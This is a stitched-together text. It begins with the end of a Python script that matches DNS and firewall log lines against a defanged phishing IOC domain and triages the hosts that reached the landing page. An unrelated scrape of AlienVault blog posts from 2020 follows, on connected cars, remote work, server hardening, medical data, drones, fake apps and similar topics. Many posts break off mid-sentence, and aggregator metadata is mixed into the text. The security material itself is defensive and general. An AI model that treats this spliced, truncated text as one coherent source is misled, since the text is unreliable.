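def refang(ioc: str) -> str:
    """Turn the defanged IOC back into a real hostname for comparison."""
    return ioc.replace("[.]", ".").replace("[dot]", ".")


def matches_domain(host: str, ioc: str) -> bool:
    """Exact match or subdomain of the IOC; a look-alike with the IOC as a prefix does not match."""
    host, ioc = host.lower().rstrip("."), ioc.lower()
    return host == ioc or host.endswith("." + ioc)


def correlate(events_text: str) -> dict:
    """Map (hostname, ip) to the stages seen: 'dns' lookup, 'http' hit on the IOC path, 'domain-only'."""
    ioc = refang(IOC_DOMAIN)
    hits = defaultdict(set)
    for line in events_text.strip().splitlines():
        kind, host, ip, detail = line.split(maxsplit=3)
        if kind == "dns" and detail.startswith("query="):
            if matches_domain(detail[len("query="):], ioc):
                hits[(host, ip)].add("dns")
        elif kind == "fw":
            m = re.search(r"https?://([^/\s]+)(/\S*)?", detail)
            if m and matches_domain(m.group(1), ioc):
                path = m.group(2) or "/"
                hits[(host, ip)].add("http" if path.startswith(IOC_URL_PATH) else "domain-only")
    return dict(hits)


def looks_like_phone(hostname: str) -> bool:
    """Same heuristic the SOC used: guess the device type from the hostname."""
    return re.search(r"iphone|android", hostname, re.IGNORECASE) is not None


def triage(hits: dict) -> dict:
    """Sources that reached the landing-page URL, split into phones and other endpoints."""
    reached = [host for (host, _ip), stages in hits.items() if "http" in stages]
    return {
        "phones": sorted(h for h in reached if looks_like_phone(h)),
        "endpoints": sorted(h for h in reached if not looks_like_phone(h)),
    }


if __name__ == "__main__":
    found = correlate(SAMPLE_EVENTS)
    for key, stages in sorted(found.items()):
        print(key, sorted(stages))
    print(triage(found))
```

The 'domain-only' bucket is the case the SOC's first alarm represented: contact with the domain but not with the landing-page path, which on its own did not justify calling the host infected.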
Any software vulnerability could undermine the safety of connected car systems and features, putting the user's sensitive information at risk as well as their physical safety. As such, automakers need to adopt a cybersecurity culture that addresses not only the obvious exposures in their vehicles' software, but also the hidden vulnerabilities that can arise from third-party components in their vehicles.  The current state of cybersecurity in connected vehicles  Cybersecurity is still not standardized in the automotive industry. According to a report by the Ponemon Institute, software security is moving at a much slower pace than technology in the industry, with only 10 percent of automakers having an established cybersecurity team. The economics of cybersecurity in cars are inherently lopsided: with the right tools, attacks are affordable, low-effort affairs, while mounting a coherent defense against them requires far more effort and investment. So far, the playing field favors the attackers, and a few incidents have put this into perspective. For example, security researchers demonstrated that a Jeep Cherokee could be hacked when they took control of the wipers, air conditioning, brakes, and accelerator from 10 miles away. Some Tesla vehicles also had a vulnerability that could potentially allow hackers to start the vehicle or cut the motor remotely.  The role of automakers in improving cybersecurity  Automakers must start viewing security testing as an investment that will result in better quality vehicles, not as an expense with no direct payback. Since technical vulnerabilities can arise at any time, automotive players need to consider cybersecurity throughout the product life cycle, starting from the design stage. 
]]> 2020-03-25T12:00:00+00:00 https://feeds.feedblitz.com/~/620309768/0/alienvault-blogs~The-future-of-cybersecurity-for-connected-cars www.secnews.physaphae.fr/article.php?IdArticle=1619146 False Vulnerability None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC 10 tips for working remotely We’re all working together to help slow the spread of COVID-19 through new policies and guidelines such as working remotely and socially distancing ourselves from others.  Working remotely can be challenging. I can offer some advice about working remotely, as I have worked both remotely and in a travel capacity for over 10 years, and I really love working that way. Here are a few things I regularly do to ensure success while still managing a work-life balance. Working from home can make it difficult to maintain a work-life balance because, well, you’re at home. So, you have to prepare your work daily and complete what you have prepared for yourself. I plan every day, at the end of the day, how to start the next morning. (I usually do it at night because I like to put in a few hours in the evening after I’ve spent some time with the family.) Document everything you do. I document what I do through a series of notes in OneNote and with my Outlook calendar and tasks. If you do something ad-hoc throughout the day, allocate time on your calendar to account for it. Make time to call some of your co-workers every day, not just for business, but for "chatting and having a few laughs" as well. You would do it in the office, why not do it from home too? It helps to keep your sanity and keeps those relationships active and current. Take breaks, get a stand-up desk, sprinkle in little things to do for yourself. Do a home chore if you need to. Make your working environment yours. Working on the coffee table is a no-no. It's not a good work environment and it doesn't do anything for productivity. Don’t be afraid to break up your workday. 
Do your most productive customer-facing activities during regular working hours, and do the work that requires a higher level of concentration after hours at your leisure; sometimes you will find that it's much easier than switching back and forth between phone calls and computer work.

Take good notes, and set aside time to think, study, and grow your knowledge. This is important to stay on top of your industry.

On a slow day, don't be afraid to walk outside for a change of scenery so that your work area doesn't become stagnant.

Take working from home as an opportunity to be there for your co-workers and family.

We're all working together to do our part in keeping each other safe. Please take care of yourself. Thanks for taking a minute to read my post, and I hope it helps make you more successful during your time spent working from home.

2020-03-24T12:00:00+00:00 https://feeds.feedblitz.com/~/620262830/0/alienvault-blogs~tips-for-working-remotely www.secnews.physaphae.fr/article.php?IdArticle=1617346 False None None None

AlienVault Blog - AlienVault is a major defense player in IOCs
Windows Server 2019 OS hardening

Windows 2019 Server Core. Server Core removes the traditional GUI interface to the operating system and provides the following security benefits:
• Server Core has a smaller attack surface than Server with a GUI
• Requires fewer software updates and reboots
• Can be managed using the new Windows Admin Center
• Improved Application Compatibility features in Windows Server 2019

Traditional Windows administrators may be apprehensive about running Server Core due to a lack of PowerShell familiarity. The new Windows Admin Center provides a free, locally deployed, browser-based app for managing servers, clusters, hyper-converged infrastructure, and Windows 10 PCs. Windows Admin Center comes at no additional cost beyond Windows and is ready to use in production.
You can install Windows Admin Center on Windows Server 2019 as well as on Windows 10 and earlier versions of Windows and Windows Server, and use it to manage servers and clusters running Windows Server 2008 R2 and later.

Secure the Local Administrator Account

Local Administrator Password Solution (LAPS)

If Windows Server does get compromised, the attacker will quickly try to move laterally across your network to find highly valuable systems and information. Credenti

2020-03-23T12:00:00+00:00 https://feeds.feedblitz.com/~/620216544/0/alienvault-blogs~Windows-Server-OS-hardening www.secnews.physaphae.fr/article.php?IdArticle=1615615 False Ransomware,Malware,Tool,Vulnerability,Patching None None

AlienVault Blog - AlienVault is a major defense player in IOCs
Exploits, vulnerabilities and threat adaptation

Department of Homeland Security's Security Lexicon, Adaptive Threats are defined as: "…threats intentionally caused by humans." It further states that Adaptive Threats are: "…caused by people that can change their behavior or characteristics in reaction to prevention, protection, response, and recovery measures taken." The concept of threat adaptation is directly linked to the defense cycle. In short, as defenses improve, threat actors change their tactics and techniques to adapt to the changing controls. As the threat actor improves their capabilities, the defensive actors necessarily have to change their own protections. This cycle continues ad infinitum until there is a disruption.
The US Department of Homeland Security (DHS) lexicon defines a vulnerability as a "…characteristic of design, location, security posture, operation, or any combination thereof, that renders an asset, system, network, or entity susceptible to disruption, destruction, or exploitation." Expanding upon this, it can be described as a susceptibility that would allow a single technique, tactic, or technology, or a combination of them (exploits), to circumvent, bypass, or defeat the protection offered by the technique, tactic, or technology in place as protection (the control) against an anticipated exploit. Succinctly, a vulnerability is a susceptibility to a given, identified exploit. While a given vulnerability in a system may not yet have been identified, it may still exist. Given enough time, effort, and the right tools, any security control can be circumvented. As stated previously, security can be expressed as a function of time and resources (S=f(TR)). It is also important to note that the concepts of exploits and vulnerabilities are inextricably entwined and mutually dependent. The common security noun "exploit" is adapted from the English verb "to exploit," which means to "use something to one's advantage." It has been turned into a noun. An exploit is defined as something that…

2020-03-17T12:00:00+00:00 https://feeds.feedblitz.com/~/619952024/0/alienvault-blogs~Exploits-vulnerabilities-and-threat-adaptation www.secnews.physaphae.fr/article.php?IdArticle=1602635 False Vulnerability,Threat None 5.0000000000000000

AlienVault Blog - AlienVault is a major defense player in IOCs
Do you have the GRIT to be a cybersecurity consultant?
Angela Duckworth's GRIT, where she explains that the secret to outstanding achievement is not talent but a unique blend of passion and persistence she calls "grit," I was able to relate the need for this power of passion and perseverance to being a successful cybersecurity professional and, more importantly, a trusted cybersecurity consultant. It takes a combination of skills, education, and years of work experience. With the right leadership and the right organization, your security career is onward and upward from that point. Here are some things that I have learned along the way and want to share.

Understanding of cybersecurity beyond technology and compliance

As a cybersecurity consultant, you act as a trusted advisor, and this provides you the opportunity to work with customers to accelerate business security goals. You offer security recommendations that are designed to fit overall business objectives while providing compliance with the organization's regulations and policies. It is vital to hone practical communication skills. Effective communication is required to deal with security teams. You have to have regular, effective communication with executives, department heads, and sometimes even the end user. Without strong communication skills, it's nearly impossible to be a successful cybersecurity consultant. Beyond cyber speak, a cybersecurity consultant must be able to understand and explain the risks to business operations when a security control fails.

Ability to thrive under pressure

Through all the years of delivering as a cyber consultant, one of the key attributes that I found to be common across all successful consultants is the ability to thrive in times of disruption. The consultant should have a passion for turning challenges and opportunities into long-term competitive advantages.
An ability to prioritize your workload, work well under pressure, and concurrently manage customers' expectations is a vital part of being a good cybersecurity consultant. We often hear folks who want to be a cyber consultant ask about which tools to learn, which technologies to focus on, etc. While all those are valid and relevant, having practical business awareness and an understanding of the cybersecurity challenges faced by organizations is vital to being able to apply the right level of security controls.

Team Player and Problem Solver

As a cybersecurity consultant, you'll work as part of a team of problem solvers, helping to solve complex business issues from strategy to execution. It is necessary to understand how the consulting business operates and adds value to clients. One of the critical attributes required of a cyber consultant is to think broadly and ask questions about data, facts, and other information. You should be able to embrace diverse perspectives and welcome opposing and conflicting ideas.

Knowledge and skill builder

Develop your knowledge around national/international security standards, including NIST, PCI, CJIS, CMS, ISO, SOX, HIPAA, HITECH, and other regulatory requirements. Gain knowledge of network design, security protocols, and cloud integration security, with excellent analytical and problem-solving skills.
• Understanding of the life cycle of network threats, attacks, attack vectors, and methods of exploitation, with an understanding of intrusion set tactics, techniques, and procedures.
• In-depth knowledge of the architecture, engineering, and operations of at least one enterprise SIEM platform.
• Advanced understanding of TCP/IP, standard networking ports and protocols, traffic flow, system administration, the OSI model, defense-in-depth, and common security elements.
• Understanding of malware analysis concepts and methods.
• Familiarity with the Cyber Kill Chain methodology.
• Knowledge of v

2020-03-16T12:00:00+00:00 https://feeds.feedblitz.com/~/619898016/0/alienvault-blogs~Do-you-have-the-GRIT-to-be-a-cybersecurity-consultant www.secnews.physaphae.fr/article.php?IdArticle=1600018 False Malware,Guideline None None

AlienVault Blog - AlienVault is a major defense player in IOCs
Malicious Actors and Medical Data: Where Are We Heading?

Data is the hottest commodity in town, particularly on the dark web. But there's one type of file that hackers are most interested in: your medical data. Whereas a credit card number or Social Security number can net a criminal $1-$15 depending on the data type, medical records can sell for the equivalent of $60 each (in Bitcoin). What's more, the theft of these files isn't uncommon. Despite U.S. healthcare organizations' mandatory compliance with the Health Insurance Portability and Accountability Act (HIPAA) Security Rule, healthcare topped the charts for the number of data breaches in 2018. And hackers don't need to break in to get the data: over half the incidents reported were the product of internal threats, either errors or bad actors. As the medical community becomes more and more reliant on internet-connected technology and generates record amounts of personal data, it is going to need to learn how to scale its cybersecurity efforts to the same extent. Patients' privacy and even their lives depend on it.

The Medical Community Needs to Get Better at Security

Stories of hacked machines, demands for payment, and blackmail are appearing in the media with greater frequency than ever. That's no surprise: ransomware attacks are a growing threat for healthcare organizations. Why? Because in a life-or-death situation, a hospital needs to decide whether to pay the hacker or lose the patient. The medical community is facing threats at a greater rate than many other industries.
Unfortunately, their security training practices match neither the growing frequency of attacks nor the obligations healthcare providers have under the law: a study by Kaspersky Lab in 2019 noted that only 29% of respondents knew and understood the HIPAA Security Rule, a fundamental part of their job. What's more, 40% of workers weren't aware of their organization's cybersecurity rules and measures. It's easy to believe that nurses, doctors, and administrative staff don't need comprehensive cybersecurity training, and that it should be the IT department's role. Unfortunately, cybersecurity doesn't work that way: hackers aren't scaling walls to get into healthcare systems; they look for open doors first. And when a doctor or nurse doesn't know how to encrypt their email, uses weak passwords, or clicks on an email infected with malware, the hacker can walk right in.

Hackers Get in Through the Most Unlikely Doors

The problem goes beyond what happens within the confines of a doctor's office or hospital setting. As healthcare organizations connect with patients through their personal devices, they'll have to secure not only their own devices and programs but also compensate for side doors created through other unsecured apps and platforms. In 2020, researchers reported that hackers were using the Google Play platform to distribute apps that screenshot sensitive user information.
To do so, the

2020-03-12T12:00:00+00:00 https://feeds.feedblitz.com/~/619728124/0/alienvault-blogs~Malicious-Actors-and-Medical-Data-Where-Are-We-Heading www.secnews.physaphae.fr/article.php?IdArticle=1593454 False Ransomware,Vulnerability,Threat,Guideline None None

AlienVault Blog - AlienVault is a major defense player in IOCs
The rising threat of drones to cybersecurity: What you need to know

The Federal Aviation Administration (FAA) reports that there are nearly 1.5 million registered drones in the United States, proving them to be ubiquitous across the country, and there are plenty that are still unregistered, too. From military use to consumers who buy them to start a new hobby, drones are now used in many aspects of today's society. Even Amazon plans on making drones part of its shipping process at some point in the future. However, the rising risk of cyber-attacks that involve drones shows they may be a threat to many.

How it's possible

While it may seem impossible for a drone to affect cybersecurity, there are several factors that make it entirely possible for drones to carry out many malicious cybercrimes. For instance, drones equipped with cameras have been associated with spying. In fact, there have been many arrests for drone spying, and that's not all a drone can do. In addition to taking bird's-eye pictures and video, drones can also be used to spy on networks, capture data, and block communications, making them a huge threat to cybersecurity as a whole. The fact that drones carry this type of threat to cybersecurity is due to their vast capabilities. In addition to cameras, many drones come equipped with GPS, USB ports, and other means that can easily allow them to be hijacked. Hackers can use tools to easily tap into drones if the owner doesn't install certain security measures.
This leaves many commercial drones at risk of exploitation, because they communicate with their operators via WiFi and GPS, which often tend to be unencrypted.

An increasing risk to cybersecurity

With all that a drone can do, it comes as no surprise that they pose such a risk to cybersecurity. In addition to the privacy issue and the fact that drones are vulnerable to hackers, previous incidents prove how risky these small aircraft can be. For instance, drones have created new risks for the security of the travel industry. It's important that drones are powered off for safety reasons during travel, and as such, there are regulations in place for traveling with them. This reduces the risks posed in airports. For example, in December of 2018, Gatwick Airport in England experienced a drone incident where drones were reported in the airspace. This came as a threat to both the airport's aircraft and travelers, which created delays, cancellations, and the disruption of travel plans for many. Even more recently, the FAA had to temporarily restrict airspace above the site of the helicopter crash that involved former professional basketball player Kobe Bryant, due to the number of drones and other aircraft that swarmed the area following the incident. Security measures such as geofencing software attempt to restrict drones from being flown near airports and other restricted areas, and radar detection is also helpful in locating nearby threats. However, in the future, the evolution of drone technology means that they may come equipped with even more advanced features, which can potentia

2020-03-09T12:00:00+00:00 https://feeds.feedblitz.com/~/619596266/0/alienvault-blogs~The-rising-threat-of-drones-to-cybersecurity-What-you-need-to-know www.secnews.physaphae.fr/article.php?IdArticle=1589546 False Threat None None

AlienVault Blog - AlienVault is a major defense player in IOCs
How to spot a fake app?
Fake apps are apps that mimic an original or legitimate app. A fake app copies the look and function of the real app to attract users to download it. Once a user downloads the fake app, multiple things can happen to the user's device. Sometimes it contains malicious content, making the mobile device act strangely. Some fake apps aggressively display ads on a device, while other apps steal information from users. There are thousands of fake apps present in different app stores. In McAfee's 2019 Mobile Threat Report, they reported detecting 65,000 fake apps. Even Apple's App Store, which is known to be the safest, had 17 apps found to be infected with malware last year. All of the apps that contained malware in Apple's store originated from one developer. The problem is that many people cannot distinguish a fake app from a real one. That's why many fall victim to this attack. If you have been a victim, or if you want to be sure not to download a fake app, you must know its characteristics. Fake apps do look similar to real apps, but they have some key points that make them different. Here are the ways you can spot a fake app on an app store.

CHECK THE NAME

Before downloading an app, make sure to check its name. See if there are misspelled words, or if the logo looks different from the real app. Popular apps often have a fake alternative; that's why, when you look for that app, you are given a lot of choices that look almost all the same. But you can check the name to know if it's real or not.

CHECK THE DEVELOPER'S NAME

If you want to download an app for your mobile device, you have to research the app. Get to know who the developer or developers are and what company the app comes from. If you have an idea about the app's background, you can more easily spot if an app is not real. To be certain, you can search for other apps the developer has built. You can click on the developer's name and see the other apps they have designed.
CHECK THE REVIEWS

Reviews can tell you what other users have experienced with the app. Be cautious if you notice negative comments or people complaining about problems with their devices since downloading the app. It could indicate that the app contains malware.

CHECK ON THE DATE

If an app was recently published, you'll be able to see this. A recently published app that is in demand can indicate that the app is fake. Most popular apps have been on the market for a while. That's why the published date should show the words "updated on" instead of a specific date.

BEWARE OF DISCOUNTS

Some apps offer discounts that are too good to be true. If you see apps promising you excellent features for a small price, this is an indicator that the app is counterfeit. It is a technique fake developers use to persuade people into downloading their apps.

LOOK AT THE SCREENSHOTS

If everything seems to look good, you can t

2020-03-05T13:00:00+00:00 https://feeds.feedblitz.com/~/619452340/0/alienvault-blogs~How-to-spot-a-fake-app www.secnews.physaphae.fr/article.php?IdArticle=1582867 False Malware,Threat None None

AlienVault Blog - AlienVault is a major defense player in IOCs
(Dis) Advantages of having your domain, email and website on separate providers

CloudWays server. This means you can take advantage of their migrator plugin, which smooths over the transition process because their engineers take care of everything for you. The result is a clean website that's moved from one place to another and is bug-free. Another smart idea is to register your domains with NameCheap. Whenever it's time to move your host, your domains won't need to change, because NameCheap helps you transfer a domain from one host to another. All you have to do is register your domain with NameCheap and then use the 'Change Ownership' option when it's time to move host while keeping the same domain. It's the same with email.
If you choose the right host, you won't need to worry about silly things like downtime or making changes to settings. Your emails will stay the same.

You'll feel more secure

Online systems are not foolproof, and cybersecurity continues to be a big issue in 2020. Every single online system is susceptible to attack. Isn't that a little scary when your domain, email, and website are all with the same provider? Literally everything you've worked hard on could be destroyed, because all a hacker has to do is decode one login. Moreover, data loss doesn't just affect you; it affects your clients, and their confidence and trust in you goes down. The stats show that 67% of all data loss is caused by system failures, while hackers are often also behind data loss. And no one is safe from an attack. Just last year, in 2019, Microsoft Office 365 accounts were attacked by hackers. On the other hand, if your email, website, and domain are all on separate providers, hackers need to figure out 3-4 logins. That is highly unlikely. Genesis web developer Andrea Whitmer has separated her email, domain, and website and points out how much time it takes to recover everything if just one attack wipes you clean out. "A few years ago, my dad's website got hacked. Not only

2020-03-04T13:00:00+00:00 https://feeds.feedblitz.com/~/619410974/0/alienvault-blogs~Dis-Advantages-of-having-your-domain-email-and-website-on-separate-providers www.secnews.physaphae.fr/article.php?IdArticle=1580691 False None None None

AlienVault Blog - AlienVault is a major defense player in IOCs
How a small business can achieve Zero Trust security

the cloud, the internet-of-things, and countless network devices help a business save money and time while making operations more efficient.
Companies are now capable of taking brainstorming discussions about new apps and turning them into prototypes in a day. But while this new efficiency is yielding incredible results, correct security must be implemented to keep these businesses prospering in the long term. Successful small businesses of any kind share a common trait: they move and grow rapidly. Broken down, this means they're bringing on new contractors and employees, experimenting with new technologies and ideas, expanding to new locations, and doing all this in a matter of days.

[Image: pirate flag on a computer screen. Image source: https://unsplash.com/photos/JJPqavJBy_k]

Experts in cutting-edge technologies like app development, AI, and machine learning are all brought on to modernize the business, while new sales and marketing experts are sourced to give the company its competitive edge. Throughout this growth, new employees and contractors are given access to the company's cloud to get involved with the work, but in doing so, the security vulnerabilities begin.

Small businesses don't have to make sacrifices for security

The speed that successful startups and small businesses experience can be addictive, but with it comes the belief that putting more work into security will cause them to slow down. The American economy is growing, with the latest US Federal Reserve Board's SCF survey finding that GDP has grown at an average rate of 2.2% since 2013. As a result of this growth, small businesses are financially better off than they were before, but their sensitive information will find itself in hackers' crosshairs more and more frequently. Luckily, with Zero Trust, businesses don't have to sacrifice much of their speed to get their security in shape. By following the correct Zero Trust approach, businesses can secure their systems, time, and intellectual property by reducing their risk of falling prey to a massive data breach.
Here are the key security steps businesses can implement in their Zero Trust approach to ensure that costly, time-consuming data breaches aren't stealing their data and hurting their momentum and reputation:

1) Track, monitor, and audit all privileged account access in real time, including metadata, to ensure you have a full picture of each user's intentions and actions within accounts. You need to know who is using your company's network. Having a full chronology of a user's actions within accounts is invaluable when it comes to cybersecurity. It gives you a much stronger chance of preventing malicious use as it happens and also helps you to discover how these incidents hap

2020-03-02T13:00:00+00:00 https://feeds.feedblitz.com/~/619328894/0/alienvault-blogs~How-a-small-business-can-achieve-Zero-Trust-security www.secnews.physaphae.fr/article.php?IdArticle=1576624 False None None None

AlienVault Blog - AlienVault is a major defense player in IOCs
Online payment security: 8 Steps to ensure safe transactions

Data Security Standard – an internationally accepted standard for secure card payments with 12 security requirements. The PCI Security Standards Council was established in 2006 to regulate payment brands and help merchants secure the financial data of customers. Regardless of the size of your business, compliance with the standard is important to ensure that you meet fundamental security requirements to process customer transactions. PCI SSC also provides online safety education to merchants and assists them in taking important steps to improve their website's safety. They analyze your transaction system, and find and fix vulnerabilities. Their compliance team then creates a report and shares it with all banks and card brands associated with your business. Compliance with PCI DSS means that your company has implemented the requirements for card payment security.
Ensure data encryption

The second step towards enhancing online payment security is to use data encryption to keep customers' financial information private. Nowadays, with open Wi-Fi networks, identity theft is prevalent and a relatively easy task for hackers if the data is unencrypted. Websites that your business deals with for online transactions should be valid and run by legitimate operators. Data encryption ensures that your sensitive information is only viewed by the authorized parties and does not fall into the wrong hands. It also reduces the likelihood of password hacking to a great extent. All these features combined provide an additional protection layer for customers during the transaction.

Keep your network updated

Hackers regularly come up with new ways to hack into systems, and while your network may be safe from them today, it may not be tomorrow. For this reason, it is really important that your business's computer networks have security updates regularly installed on them. The best way is to sign up for automatic system updates to stay a step ahead of new threats. Automatic updates will ensure that all important safeguards are installed, the absence of w

2020-02-27T13:00:00+00:00 https://feeds.feedblitz.com/~/619133740/0/alienvault-blogs~Online-payment-security-Steps-to-ensure-safe-transactions www.secnews.physaphae.fr/article.php?IdArticle=1568638 False Hack,Vulnerability None None

AlienVault Blog - AlienVault is a major defense player in IOCs
How to harden your employees from the massive social engineering threat

Leading Cyber Ladies meetup in Toronto recently, where threat research expert Sherrod DeGrippo visited all the way from Atlanta to talk about how cyber threats often work these days, and what their attack chains are like. I had the idea to write about social engineering before I attended the meeting, but I wasn't expecting to do research for this post by attending it.
It was just a very fortunate coincidence that DeGrippo said some things about social engineering that really captured my attention. After the meeting, we had a quick chat and followed each other on Twitter.

During her talk at the meeting, DeGrippo mentioned how she sees a lot of cyber attackers, from APTs to script kiddies, target human beings as an initial attack vector a lot more often than they used to. She said doing reconnaissance on a corporate network is very difficult, whereas doing reconnaissance on a person is a lot easier. We post about ourselves on social media all the time. We talk about the places we've visited and the things we like on Twitter. We talk about who our family and friends are on Facebook. And we tell LinkedIn our job titles, who we work for, and what we do there. An individual who works for a targeted company has privileged access to their networks and to their physical buildings. Socially engineer them, and you can get malware on their systems to send sensitive data to a command and control server, or you could possibly walk into an employees-only area of an office.

The other thing she discussed which intrigued me is that she sees information security professionals targeted for social engineering attacks more often than ever before, and how we can be really lucrative for social engineering exploitation. Contrary to us thinking that we know better, it often works! I asked DeGrippo about it. She said:

"Yes, targeting infosec professionals is my big concern lately. The more sophisticated actors are doing really specific targeting. This includes people in security roles and lots of people in software development roles. There is so much info out there. A job offer, a security report, a discussion of a new technology and a code snippet: all potential social engineering lures to send to technical people with privileged access."

I said, "Maybe some of us are way too confident. That confidence can be dangerous."

"… totally. I worry about that.
I worry that as an industry we are so focused on protecting others that we let our own opsec (operational security) slip, or we just don't have time to focus on it as much. It's not really hubris in most cases, it's just forgetting to do a threat model on ourselves."

She also spoke to me about how cyber attackers often choose their social engineering targets.

"The thing I like to do is get into the psychology of a threat actor. If I could be anyone I wanted to be, but only online, who would I choose? A software dev at a fancy car company? I could hack some luxury car software to unlock for me anytime, anywhere! A junior HR admin at a large company? Steal a ton of identity and payroll data! Maybe I would be a fancy CFO's assistant and make changes to deposit instructions for invoices to my own mule account

2020-02-25T13:00:00+00:00 https://feeds.feedblitz.com/~/619020986/0/alienvault-blogs~How-to-harden-your-employees-from-the-massive-social-engineering-threat www.secnews.physaphae.fr/article.php?IdArticle=1564782 False Malware,Hack,Threat,Guideline None None

AlienVault Blog - AlienVault is a major defense player in IOCs
Dawn of a new decade: Leaping from GRC to IRM - A building block approach

What is in a name? Moving beyond acronyms:

As you are putting together the building blocks of IRM and moving beyond GRC, some of the key considerations should be around the outcomes of the IRM initiative. Is this going to help build a risk-aware culture within your organization? A cyber strategy is closely linked to business strategy, and a risk-aware culture gets your cybersecurity initiatives a step closer to the business objective. That brings about the need for a formalized risk strategy within your organization. It is not about listing out all the potential risks, but about being able to tie them to business outcomes and, more importantly, to see them through to risk mitigation.
Today, we see many point solutions within organizations, and the data generated from many sources never makes it into the overall risk posture and does not feed into the actionable decision-making process. With increased attention being paid to risk management as a critical driver for business success, more companies are thinking about the potential of an integrated risk management approach, and we hope this triggers an initial action plan that can be applied in that process.

2020-02-24T13:00:00+00:00 https://feeds.feedblitz.com/~/618966580/0/alienvault-blogs~Dawn-of-a-new-decade-Leaping-from-GRC-to-IRM-A-building-block-approach www.secnews.physaphae.fr/article.php?IdArticle=1563287 False Guideline None None

AlienVault Blog - AlienVault is a major defense player in IOCs
Is the cybersecurity skills gap real?

2018 (ISC)² Cybersecurity Workforce Study, more than 2.9 million cybersecurity-related job positions worldwide were unfilled. In the time that's passed, that number has likely grown. These are positions spanning a wide range of roles, from SOC analysts to DFIR, from penetration testers to application security specialists. Not having people work in these positions that organizations have recognized as needs inevitably weakens cybersecurity everywhere, and companies lose huge amounts of money in cyber attacks and data breaches. I have my own personal views on the matter. But cybersecurity people on Twitter also talk a lot about unrealistic job posting expectations and their impact on the skills gap. Shawn Thomas is a SOC manager. He tweeted about his exasperation with job posting requirements:

"If your entry level job in infosec requires:
A masters
At least 3 certs
Prefers two years of experience.
YOU ARE NOT ALLOWED TO COMPLAIN THAT IT'S HARD TO FIND CANDIDATES
Additionally, the discouragement students have when they hear that should make you feel bad about yourselves."

I also have an industry friend who has done a lot of her own research into the skills gap matter. Plus, she has experience hiring for cybersecurity roles, experience that I lack. Alyssa Miller is a security evangelist and hacker, and she shares her knowledge at so many security conferences that it'd overwhelm me to do the same. She has written many posts on her blog about the skills gap, so I wanted to learn a bit from he

2020-02-20T13:00:00+00:00 https://feeds.feedblitz.com/~/618797078/0/alienvault-blogs~Is-the-cybersecurity-skills-gap-real www.secnews.physaphae.fr/article.php?IdArticle=1554316 False Threat None None